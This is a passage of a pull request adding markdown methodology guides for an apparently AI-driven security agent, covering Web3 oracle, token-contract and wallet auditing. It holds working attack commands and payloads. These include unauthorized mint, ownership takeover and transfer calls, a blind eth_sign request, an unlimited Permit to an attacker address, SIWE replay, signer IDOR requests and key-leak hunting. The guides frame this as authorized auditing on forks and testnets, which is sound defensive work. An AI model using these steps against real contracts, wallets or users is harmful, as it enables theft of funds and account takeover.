+- A contract that reads `slot0()`/`getReserves()` but only for a **non-financial** purpose (UI hint, event emission) — no value is gated on it.
+- TWAP over a sufficiently long window and a deep pool where the cost to sustain manipulation across the averaging period exceeds any profit — model the cost before claiming.
+- Staleness "bugs" where an upstream guard (a wrapper library, a separate freshness modifier) already enforces the heartbeat — trace the full call chain, not one function.
+- "Manipulable" spot reads that are bounded by a deviation circuit-breaker or chained against a second independent oracle.
+- Negative-answer concern on feeds that are documented as always-positive AND guarded elsewhere; confirm the cast actually lacks a check.
+- Fork PoCs that profit only because the test mints free tokens or skips flash-loan repayment — an unrealistic precondition is not a finding.
+
+## Chaining & Impact
+
+- Spot manipulation → inflated collateral value → over-borrow → protocol left insolvent (bad debt) once the price snaps back.
+- Spot manipulation → deflated collateral value → trigger unjust liquidations → seize others' positions at a discount.
+- Stale/zero price → mint or redeem at a wrong rate → drain the mint/redeem path or break a stablecoin peg.
+- Read-only reentrancy on a derived price → skewed share price → mispriced deposit/withdraw → vault drain.
+- Writable/untrusted source → push an arbitrary answer → settle a derivative or auction at attacker-chosen value.
+- Each of these typically composes with a flash loan, so the attacker needs near-zero starting capital and exits in one transaction.
+
+## Pro Tips
+
+- Always resolve the proxy to its underlying aggregator and the aggregator's owner; the "Chainlink feed" may be a custom proxy a deployer can repoint.
+- Cost-to-manipulate scales with pool depth and TWAP length. Read `liquidity()`/reserves first — a thin pool with a short or absent average is the cheapest break.
+- The most common real bug is not exotic manipulation but a missing `updatedAt`/`answeredInRound`/`p > 0` check — grep every `latestRoundData` consumer for all three guards.
+- Watch division-before-multiplication and hardcoded `1e8`/`1e18`; Slither's `divide-before-multiply` and a manual `decimals()` diff catch most scaling errors.
+- Pin the fork block. Mainnet drift makes manipulation PoCs flaky and undermines the report; a fixed block plus repaid flash loan is what a defender will re-run.
+- For Pyth/Redstone, verify the consumer checks the report's `publishTime`/confidence and the correct feed id — accepting an unvalidated signed blob is equivalent to a writable oracle.
+- Prefer a forge test as the deliverable PoC over prose; an executable, self-funding transaction is the unambiguous proof.

--- a/strix/skills/web3/token_contract.md
+++ b/strix/skills/web3/token_contract.md
@@ -1,0 +1,156 @@
+---
+name: token_contract
+description: Auditing on-chain NFT/token contracts for mint, transfer, approval, and access-control flaws that drain funds or seize ownership.
+---
+
+# NFT / Token Contract
+
+The asset is a deployed smart contract identified by an on-chain address (ERC-20, ERC-721, ERC-1155, or a custom variant), usually fronted by a dApp, an indexer/API, and a public RPC. The attacker objective is direct economic impact: mint unauthorized supply, move or burn other holders' assets, drain the treasury/escrow, hijack ownership/admin roles, or break the proxy so future upgrades are attacker-controlled. Audit mint/transfer/approval logic and access control first — that is where almost all real loss originates.
+
+## Attack Surface
+
+**On-chain (the contract itself)**
+- Public/external state-changing functions: `mint`, `mintTo`, `safeMint`, `transferFrom`, `safeTransferFrom`, `approve`, `setApprovalForAll`, `burn`, `withdraw`, `claim`, `redeem`.
+- Privileged functions guarded by `onlyOwner`/role modifiers: `setBaseURI`, `setPrice`, `setMintActive`, `withdrawFunds`, `grantRole`, `upgradeTo`, `pause/unpause`.
+- Proxy machinery: EIP-1967 implementation/admin slots, `initialize()` initializers, `delegatecall` targets, beacon contracts.
+- Value flows: `payable` mint, refund logic, royalty/`receiver` payouts, fee-on-transfer hooks, ERC-777/1155 `tokensReceived` callbacks.
+- Economic dependencies: price oracle reads, `block.timestamp`/`block.number` gates, on-chain randomness for trait/reveal.
+
+**Off-chain (the surrounding system)**
+- dApp frontend, mint allowlist API, signature/voucher minting endpoints, metadata server (`tokenURI` → IPFS/HTTP).
+- Indexer/subgraph and read APIs that can be poisoned or desynced.
+- Deployer keys, multisig signers, and CI/CD that holds private keys.
+
+## Recon & Enumeration
+
+Install the EVM tooling (not in base Kali):
+```
+pipx install slither-analyzer mythril
+pipx install crytic-compile
+curl -L https://foundry.paradigm.xyz | bash && foundryup   # cast/forge/anvil
+npm i -g @openzeppelin/upgrades-core   # storage-layout / upgrade safety
+```
+
+Identify and pull the target. With a verified contract, fetch the source:
+```
+export ETHERSCAN_API_KEY=...; export RPC=https://eth-mainnet.g.alchemy.com/v2/KEY
+cast etherscan-source -d ./src 0xCONTRACT --chain mainnet
+cast code 0xCONTRACT --rpc-url $RPC | head -c 64   # non-empty == deployed
+```
+
+Resolve standard, owner, and proxy via on-chain reads:
+```
+cast call 0xCONTRACT "supportsInterface(bytes4)(bool)" 0x80ac58cd --rpc-url $RPC   # ERC-721
+cast call 0xCONTRACT "supportsInterface(bytes4)(bool)" 0xd9b67a26 --rpc-url $RPC   # ERC-1155
+cast call 0xCONTRACT "owner()(address)" --rpc-url $RPC
+cast storage 0xCONTRACT 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc --rpc-url $RPC  # EIP-1967 impl slot
+cast storage 0xCONTRACT 0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103 --rpc-url $RPC  # EIP-1967 admin slot
+```
+If only bytecode is available, decompile and recover selectors:
+```
+cast 4byte-decode <calldata>            # known-selector lookup
+cast disassemble 0xCONTRACT --rpc-url $RPC | grep -i PUSH4   # candidate selectors
+# panoramix / heimdall-rs for full decompilation when unverified
+```
+
+Static analysis on the recovered source:
+```
+slither ./src --checklist --json slither.json
+slither ./src --print human-summary
+slither ./src --print function-summary   # lists modifiers/visibility per function
+myth analyze ./src/Token.sol --solv 0.8.20 -o jsonv2   # symbolic exec, slower
+semgrep --config p/smart-contracts ./src
+```
+
+Off-chain surface (dApp, mint API, metadata) with the standard web kit:
+```
+subfinder -d mint.target.tld -silent | httpx -silent -tech-detect -json -o web.jsonl
+katana -u https://mint.target.tld -jc -d 3 -o urls.txt        # find /api signature endpoints
+ffuf -u https://api.target.tld/FUZZ -w api-wordlist.txt -mc 200,401,403
+nuclei -l web.txt -as -s critical,high -rl 50 -c 20 -j -o nuclei.jsonl
+trufflehog filesystem ./repo --only-verified   # leaked deployer/signer keys in the repo
+gitleaks detect -s ./repo --redact
+```
+
+## Methodology
+
+1. **Pin the target.** Confirm address, chain, standard (ERC-20/721/1155), and whether it is a proxy. Map implementation vs admin. Verify the source matches the deployed bytecode (`cast code` keccak vs compiled runtime).
+2. **Map authority.** Enumerate every state-changing function and its guard. Build a table: function → modifier → who can call it. Flag any privileged action reachable without `onlyOwner`/role/`require(msg.sender == ...)`.
+3. **Audit mint logic.** Check supply cap enforcement, per-wallet limits, price/`msg.value` validation, allowlist/signature verification, and whether `_mint`/`_safeMint` is callable by anyone.
+4. **Audit transfer/approval.** Verify `transferFrom` checks `isApprovedOrOwner`, that `approve`/`setApprovalForAll` cannot be set on behalf of others, and that custom hooks/overrides did not remove the ownership check.
+5. **Trace value flow.** Follow ETH/token in (mint, deposit) and out (withdraw, royalty, refund). Look for reentrancy, unchecked external calls, and arbitrary `to`/`receiver`.
+6. **Check proxy/upgrade safety.** Open `initialize`, storage layout collisions, `delegatecall` to attacker-controllable targets, unprotected `upgradeTo`, and self-destruct in the implementation.
+7. **Validate off-chain.** Test the signature minting endpoint for replay, missing nonce/chainId, and forgeable vouchers; test metadata for mutability and access control.
+8. **Reproduce on a fork.** Use `anvil --fork-url $RPC` to execute the exploit against real state with zero mainnet impact, then quantify loss.
+
+## Key Weaknesses / Techniques
+
+**Unprotected mint / privileged function (broken access control).** The most common real bug: `mint`/`setBaseURI`/`withdraw` missing `onlyOwner`, or a public `_mint` wrapper. Confirm the modifier is absent in `function-summary`, then call directly on a fork:
+```
+cast send 0xCONTRACT "mint(address,uint256)" $ME 1000000 --rpc-url http://127.0.0.1:8545 --private-key $PK
+cast call 0xCONTRACT "balanceOf(address)(uint256)" $ME --rpc-url http://127.0.0.1:8545
+```
+
+**Uninitialized / re-callable initializer.** Behind a proxy, if `initialize()` lacks the `initializer` modifier or the implementation was never initialized, anyone can become owner:
+```
+cast send 0xCONTRACT "initialize(address)" $ME --rpc-url http://127.0.0.1:8545 --private-key $PK
+cast call 0xCONTRACT "owner()(address)" --rpc-url http://127.0.0.1:8545   # expect $ME
+```
+
+**Missing approval check in transfer.** A custom `transferFrom` override that drops `_isApprovedOrOwner` lets anyone move arbitrary tokens:
+```
+cast send 0xCONTRACT "transferFrom(address,address,uint256)" $VICTIM $ME 42 --rpc-url http://127.0.0.1:8545 --private-key $PK
+```
+
+**Reentrancy in mint/withdraw.** `_safeMint` invokes `onERC721Received`, and ERC-1155/777 hooks call back before state finalizes. If supply/limit accounting or `withdraw` updates state after the external call, loop it. PoC: deploy an attacker contract whose `onERC721Received` re-enters `mint` to exceed the per-wallet cap.
+
+**Signature voucher flaws (off-chain mint).** Allowlist mints signed by a backend: test for (a) no nonce → replay the same signature N times; (b) missing `chainId`/contract address in the signed digest → cross-chain/cross-contract replay; (c) `ecrecover` not checking `v=0` and zero-address return; (d) signer key recoverable from leaked env. Replay:
+```
+cast send 0xCONTRACT "mintWithSig(uint256,bytes)" 1 0xSIG --rpc-url $FORK --private-key $PK   # repeat
+```
+
+**Integer/accounting and fee-on-transfer.** Pre-0.8 unchecked math, or `unchecked{}` blocks; deflationary tokens where received amount < sent amount breaks internal balance math and enables drains in vaults/escrows.
+
+**Weak randomness for traits/reveal.** `keccak256(block.timestamp, block.difficulty, msg.sender)` is predictable — a contract can mint, inspect the rolled trait in the same tx, and `revert` if undesirable to grind rares.
+
+**Price/oracle manipulation.** Mint price or collateral valued via a spot AMM read is flash-loan manipulable; verify a TWAP or off-chain oracle is used.
+
+**Royalty / arbitrary `to` withdraw.** `withdraw(address to)` or settable `royaltyReceiver` callable by non-admin redirects funds.
+
+Re-run `slither ./src --detect arbitrary-send-eth,reentrancy-eth,unprotected-upgrade,suicidal,uninitialized-state,incorrect-modifier` to corroborate each class.
+
+## Validation
+
+- **Fork, don't touch mainnet.** Run everything against `anvil --fork-url $RPC --fork-block-number N`. Use `cast rpc anvil_impersonateAccount $VICTIM` and `anvil_setBalance` to set up state; never submit the exploit to the live chain.
+- **Quantify the loss.** Capture before/after `balanceOf`, `totalSupply`, or contract ETH balance and report the exact delta (e.g. minted 1,000,000 unauthorized tokens, or drained X ETH).
+- **Minimal reproducer.** Ship a `forge test --fork-url $RPC` test (`vm.prank`, `vm.expectRevert` absent) that asserts the unauthorized state change. A passing PoC test is the proof, not a Slither line.
+- **For off-chain bugs**, show the replayed signature producing a second mint, or the leaked key signing a valid voucher.
+
+## False Positives
+
+- Slither/Mythril "reentrancy" on functions that follow checks-effects-interactions or carry `nonReentrant` — read the code, don't report the lint.
+- Privileged functions that *are* meant to be owner-only and *are* guarded — power held by a known multisig/timelock is centralization risk, not an exploitable bug, unless the key is compromised.
+- "Uninitialized state variable" findings for constants set in the constructor, or proxies already initialized (check the `_initialized` slot via `cast storage`).
+- Predictable randomness on a testnet/already-revealed collection where no value depends on the roll.
+- `tx.origin` warnings where it is used for logging only, not auth.
+- Findings only reachable by the deployer/owner with no privilege boundary crossed.
+
+## Chaining & Impact
+
+- Uninitialized proxy → become owner → `upgradeTo(maliciousImpl)` → arbitrary `delegatecall`/self-destruct → total contract takeover and fund drain.
+- Unprotected mint → inflate supply → dump on the AMM pool → drain the paired ETH/stablecoin liquidity.
+- Missing approval check → sweep an entire collection's high-value tokens to attacker wallet → list/sell before holders react.
+- Leaked deployer key (trufflehog/gitleaks) → call `withdraw`/`grantRole`/`upgradeTo` directly, skipping every on-chain guard.
+- Signature replay → unlimited "allowlist" mints → bypass supply cap and economic model.
+- Reentrancy in `withdraw` → drain the escrow/treasury balance in one transaction.
+
+## Pro Tips
+
+- Diff the contract against the canonical OpenZeppelin implementation it claims to extend; the bug is almost always in the *override* that removed a check, not in OZ.
+- A proxy's `owner()` lives in the implementation's storage but executes via the proxy — always interact through the proxy address, and read the EIP-1967 slots, not a guessed slot 0.
+- `slither ./src --print function-summary` gives the fastest authority map: scan the "modifiers" column for state-changing functions with an empty cell.
+- Verify deployed bytecode equals the verified source before trusting Etherscan; metadata/CBOR tails differ but the runtime should match.
+- For unverified targets, recover selectors with `cast disassemble | grep PUSH4` and brute them against the 4byte directory before reaching for a full decompiler.
+- Always fork at a specific block (`--fork-block-number`) so the PoC is deterministic and reviewable.
+- Check the metadata `tokenURI`: a mutable HTTP base lets the operator rug the art; an IPFS CID is immutable — note the difference for risk rating.
+- When testing the off-chain mint API, include `chainId` and the contract address in your forged digest and confirm `ecrecover` rejects it — many backends sign only the wallet+amount.

--- a/strix/skills/web3/wallet.md
+++ b/strix/skills/web3/wallet.md
@@ -1,0 +1,171 @@
+---
+name: wallet
+description: Assess crypto wallet key storage, signing flows, and transaction-approval UX across browser extensions, mobile apps, and embedded/MPC backends.
+---
+
+# Wallet (Identifier)
+
+A wallet is the identifier and trust boundary that maps a private key (or MPC key share) to on-chain identity and signing authority. The asset spans browser-extension wallets, mobile wallets, hardware-backed and embedded wallets, and custodial/MPC backends. The attacker's objective is to extract or exercise signing authority without the owner's intent: recover seeds/keys from storage, coerce a signature through a deceptive approval flow, or abuse a signed message/transaction to drain funds or take over the account that gates an app's auth. Treat any path that yields a valid signature over attacker-chosen data as equivalent to key compromise.
+
+## Attack Surface
+
+**Key material at rest**
+- Browser extension: `chrome.storage.local`, IndexedDB, LevelDB vaults, `localStorage` (encrypted keyring blobs)
+- Mobile: Keychain (iOS) / Keystore (Android), SharedPreferences, SQLite, app sandbox files, cloud/iCloud/Android backups
+- Embedded/MPC: server-held key shares, KMS/HSM wrappers, recovery share escrow, social-recovery guardians
+
+**Signing entry points**
+- `eth_sign`, `personal_sign`, `eth_signTypedData_v4` (EIP-712), `eth_sendTransaction`, `wallet_sendCalls` (EIP-5792)
+- WalletConnect (v2) session proposals and `wc:` pairing URIs / deep links
+- dApp connector: `window.ethereum` / EIP-1193 provider, `wallet_addEthereumChain`, `wallet_switchEthereumChain`
+- "Sign-In with Ethereum" (EIP-4361 / SIWE) auth messages
+- Solana `signMessage` / `signTransaction` / `signAllTransactions`
+
+**Approval / consent UX**
+- Transaction confirmation screens, spend-limit (ERC-20 `approve` / `Permit` / `Permit2`) prompts
+- Network/chain switch prompts, account-disclosure prompts
+- Deep links and intent handlers that pre-fill or auto-confirm
+
+**Backend / API**
+- Wallet-as-a-service signing APIs, gas sponsorship / paymaster (ERC-4337) endpoints
+- RPC providers and bundler endpoints, broadcast/relayer services
+
+## Recon & Enumeration
+
+Most relevant tools are in the sandbox. Asset-specific tooling install commands noted inline.
+
+```bash
+# --- Map the dApp / wallet web surface ---
+subfinder -d target.tld -all -silent | httpx -silent -title -tech-detect -o hosts.txt
+katana -u https://app.target.tld -jc -kf all -d 5 -o urls.txt        # crawl + JS for provider calls
+nuclei -l hosts.txt -as -s critical,high -rl 50 -c 20 -bs 20 -timeout 10 -j -o nuclei.jsonl
+
+# --- Hunt for leaked keys / seeds / RPC secrets (the highest-value bug) ---
+trufflehog filesystem ./build --only-verified --json > tf.json
+trufflehog git https://github.com/org/wallet-app --only-verified
+gitleaks dir ./ -v --report-path gitleaks.json
+# Regexes worth grepping JS bundles / source / configs:
+#   BIP-39 mnemonic (12/24 words), 0x[0-9a-f]{64} priv keys, "INFURA_KEY", "ALCHEMY", "PRIVATE_KEY="
+
+# --- Browser-extension static analysis ---
+# Pull the .crx, unzip, then audit manifest + storage handling
+unzip wallet.crx -d ext/ ; jq . ext/manifest.json     # check permissions, host_permissions, CSP
+semgrep --config p/javascript --config p/secrets ext/  # weak crypto, postMessage, eval, dynamic import
+grep -rnE 'eth_sign|personal_sign|signTypedData|chrome.storage|localStorage' ext/
+
+# --- Mobile (APK / IPA) static analysis ---
+# apktool d app.apk ; or use jadx for decompiled Java/Kotlin
+pip install apkleaks ; apkleaks -f app.apk            # URIs, secrets, endpoints
+grep -rnE 'getSharedPreferences|MODE_WORLD|allowBackup|android:debuggable' app/
+# Confirm Keystore usage vs plaintext: look for SharedPreferences writing seed/key strings
+
+# --- Smart-contract / approval target analysis (if a contract gates the wallet's funds) ---
+pip install slither-analyzer mythril
+slither 0xTokenOrVault --etherscan-apikey $KEY        # or slither ./contracts
+myth analyze contracts/Vault.sol --execution-timeout 120
+
+# --- WalletConnect / RPC endpoint probing ---
+naabu -host rpc.target.tld -p 80,443,8545,8546 -silent
+httpx -u https://rpc.target.tld:8545 -json -method POST \
+  -body '{"jsonrpc":"2.0","method":"eth_accounts","id":1}'   # unauth account exposure?
+
+# --- OAST for blind callbacks from any URL/metadata the wallet fetches ---
+interactsh-client -v                                  # token-list / NFT-metadata SSRF oracle
+```
+
+## Methodology
+
+1. **Define the boundary.** Identify each component holding or exercising signing authority: extension keyring, mobile keystore, embedded/MPC backend, hardware bridge. Each is tested separately.
+2. **Hunt key material first.** Run trufflehog/gitleaks over repos, build artifacts, and JS bundles; inspect extension storage and mobile preferences for plaintext or weakly-encrypted seeds/keys. A leaked key ends the engagement on that account.
+3. **Audit the at-rest crypto.** Determine the vault KDF and parameters (scrypt/PBKDF2 iterations, salt uniqueness, AES-GCM vs ECB). Weak KDF + exfiltrable blob = offline brute-force.
+4. **Map signing methods.** Enumerate every RPC method the provider exposes to a dApp. Flag legacy `eth_sign` (blind signing of arbitrary 32-byte hashes) and any auto-approve path.
+5. **Probe the approval UX.** Build a hostile dApp that requests signatures and watch what the confirmation screen actually shows: is the spender, amount, chain, and decoded calldata accurate and unspoofable?
+6. **Test SIWE / signed-message auth.** Capture the SIWE message; check domain binding, nonce, expiry, and chainId. A reusable or domain-agnostic signature is account takeover.
+7. **Test allowance flows.** Look for unlimited `approve`, blind `Permit`/`Permit2`, and `setApprovalForAll` requests obscured in the UX.
+8. **Assess the backend signer.** For WaaS/MPC, test authn/authz on signing APIs, replay, IDOR across user keys, and gas-sponsorship abuse.
+9. **Validate with a PoC** that produces a real (testnet) signature or storage extraction, then document chaining and impact.
+
+## Key Weaknesses / Techniques
+
+**Plaintext or weakly-encrypted key storage.** Seed/private key written to `localStorage`, SharedPreferences, or an SQLite row in clear, or encrypted with a low-iteration KDF.
+```bash
+# Pull extension vault and inspect KDF strength
+strings ext_storage/leveldb/*.ldb | grep -iE 'salt|cipher|kdf|iterations|"data"'
+# If the encrypted blob is exfiltrable and KDF is weak, mount an offline guess against the unlock password.
+```
+
+**Blind signing via `eth_sign`.** `eth_sign` signs an opaque hash; an attacker presents a hash that is actually `keccak256(rlp(transaction))`, turning a "sign this message" prompt into an authorized transfer.
+```js
+// Hostile dApp request — the user sees only a hex blob, not a transfer
+ethereum.request({ method: 'eth_sign', params: [userAddr, '0x' + dangerousTxHash] })
+```
+Finding: wallet allows `eth_sign` without a hard warning / decoded preview.
+
+**EIP-712 typed-data spoofing.** `signTypedData_v4` payloads (`Permit`, `Permit2`, Seaport orders) are human-unreadable; the approval screen may not decode `spender`, `value`, or `deadline`, so an off-chain signature authorizes a later drain.
+```json
+{"types":{"Permit":[{"name":"owner","type":"address"},{"name":"spender","type":"address"},
+{"name":"value","type":"uint256"},{"name":"nonce","type":"uint256"},{"name":"deadline","type":"uint256"}]},
+"domain":{"name":"USDC","chainId":1,"verifyingContract":"0xA0b8..."},
+"message":{"spender":"0xATTACKER","value":"115792089237316195423570985008687907853269984665640564039457584007913129639935"}}
+```
+
+**Unlimited / hidden allowances.** `approve(spender, uint256max)` or `setApprovalForAll(operator,true)` requested under a benign label. Verify the prompt surfaces spender identity and the actual amount.
+
+**SIWE / signed-auth flaws.** Missing domain binding, static/absent nonce, no expiry, or chainId not enforced → a signature captured on a phishing domain (or replayed) authenticates the victim elsewhere.
+```bash
+# Replay a captured SIWE signature against the auth endpoint
+httpx -u https://app.target.tld/api/siwe/verify -method POST \
+  -body '{"message":"<captured-siwe-message>","signature":"0x<captured-sig>"}'
+```
+
+**Malicious chain/network injection.** `wallet_addEthereumChain` adding a chain whose RPC is attacker-controlled, or a spoofed chainId that makes the user sign for a different network than displayed.
+
+**Backend signer authz / replay.** WaaS or MPC signing API that lacks per-request authn, allows IDOR across `userId`/`keyId`, or accepts replayed signing requests.
+```bash
+# Swap the owner identifier and see if you can sign for another user's key
+httpx -u https://api.target.tld/v1/wallets/<victimId>/sign -method POST \
+  -H 'Authorization: Bearer <attackerToken>' -body '{"payload":"0x<txhash>"}'
+```
+
+**Clipboard / deep-link hijack.** Mobile wallets that auto-fill recipient from clipboard, or `wc:`/custom-scheme deep links that pre-populate or auto-confirm a transaction.
+
+**Token-list / NFT-metadata SSRF & XSS.** Wallet fetches remote token logos / NFT JSON; unvalidated URLs hit internal services (use the interactsh oracle) or render HTML/SVG that executes script in the wallet UI context.
+
+## Validation
+
+- **Key extraction:** Demonstrate recovery of the seed/private key from an exfiltrated artifact (storage blob, backup, repo), or recompute the address from the recovered key to prove it matches the target wallet. Show the offline KDF crack only against your own test password.
+- **Signature coercion:** On a testnet, run the hostile dApp end-to-end and capture a valid signature/transaction the wallet produced over attacker-chosen data; verify with `ecrecover` that the signer == target address.
+- **SIWE replay:** Show the captured signature authenticating a session you did not legitimately establish (new cookie/JWT issued).
+- **Backend signer:** Produce a signature for a key/user other than the authenticated principal, or replay a prior signing request successfully.
+- Always prove signer recovery (`ecrecover` / `personal_recover`) so a finding is not just "a prompt looked odd."
+
+## False Positives
+
+- Encrypted vault that is only decryptable with the user's password and uses a strong KDF (high-iteration scrypt/PBKDF2, unique salt) — exfiltrating the blob alone is not key compromise.
+- Hardware-wallet or secure-enclave-bound keys where the host never sees the private key; a "leaked" handle is not the key.
+- `eth_sign` blocked or hard-gated behind an explicit risk acknowledgment.
+- SIWE signatures that are correctly domain-bound, nonced, and time-limited — capturing one does not yield reuse.
+- OAST callbacks whose source IP is the tester/browser, not the wallet backend (client-side fetch, not server SSRF).
+- Testnet-only signing demos that cannot affect mainnet keys or funds.
+- Allowance prompts that fully and accurately decode spender + amount and let the user edit the limit.
+
+## Chaining & Impact
+
+- Leaked seed/private key → full key compromise → drain all assets across every chain that key controls.
+- Exfiltrable vault + weak KDF → offline password crack → key recovery → drain.
+- Blind `eth_sign` / spoofed EIP-712 `Permit` → off-chain signature → later on-chain `transferFrom` drains tokens without a second prompt.
+- Hidden `setApprovalForAll` → operator drains an entire NFT collection.
+- SIWE replay / weak nonce → account takeover of the dApp the wallet authenticates, then in-app fund movement or admin actions.
+- Backend signer IDOR/replay → sign for arbitrary users → mass drain of a custodial/MPC fleet.
+- Token-list SSRF → cloud metadata creds → control-plane access to the wallet provider's infrastructure.
+
+## Pro Tips
+
+1. The cheapest critical is a leaked key — run trufflehog/gitleaks across repos, CI logs, and minified bundles before anything dynamic.
+2. Off-chain signatures (`Permit`, `Permit2`, Seaport) are more dangerous than transactions: they cost no gas, leave no on-chain trace until executed, and approval UX rarely decodes them. Prioritize them.
+3. Always run `ecrecover` on any signature you obtain — a recovered address matching the target is unambiguous proof and removes UX subjectivity.
+4. Diff what the approval screen *shows* against what is actually signed; the gap between displayed intent and signed bytes is where most real wallet bugs live.
+5. For extensions, the storage layer (LevelDB/IndexedDB) is the prize — `chrome.storage.local` survives across sessions and is readable by any code with the extension's origin.
+6. On mobile, check `android:allowBackup` and iCloud Keychain sync; a seed that syncs to a backup is reachable without rooting the device.
+7. Test `wallet_addEthereumChain` with an attacker RPC — a wallet that trusts the dApp-supplied chainId/RPC can be made to display one network while signing for another.
+8. For MPC/WaaS, the key never leaves the backend, so pivot from "extract the key" to "make the backend sign" — authz, IDOR, and replay on the signing API are the real targets.


### PR DESCRIPTION
## What

Adds deep per-asset methodology **skills** for Web3 asset types (nodes, dApps, tokens, bridges, oracles, wallets, crypto libs, DLT).

Part of the asset-coverage effort (foundation in #533, which adds the asset taxonomy + detection + recommended-skill hooks). These files provide the deep methodology each asset type's recommendation points at.

## Skills added

- `strix/skills/web3/blockchain_node.md`
- `strix/skills/web3/cross_chain_bridge.md`
- `strix/skills/web3/crypto_library.md`
- `strix/skills/web3/defi_dapp.md`
- `strix/skills/web3/dlt.md`
- `strix/skills/web3/oracle_integration.md`
- `strix/skills/web3/token_contract.md`
- `strix/skills/web3/wallet.md`

## Notes

- Markdown only; no code changes. Auto-discovered by the skills loader (`get_available_skills` / `load_skills`), so they appear in `available_skills` and are loadable via `load_skill` or `create_agent(skills=[...])`.
- Each follows the house template/tone (cf. `vulnerabilities/ssrf.md`).
- No filename overlap with #532 (complementary asset coverage).
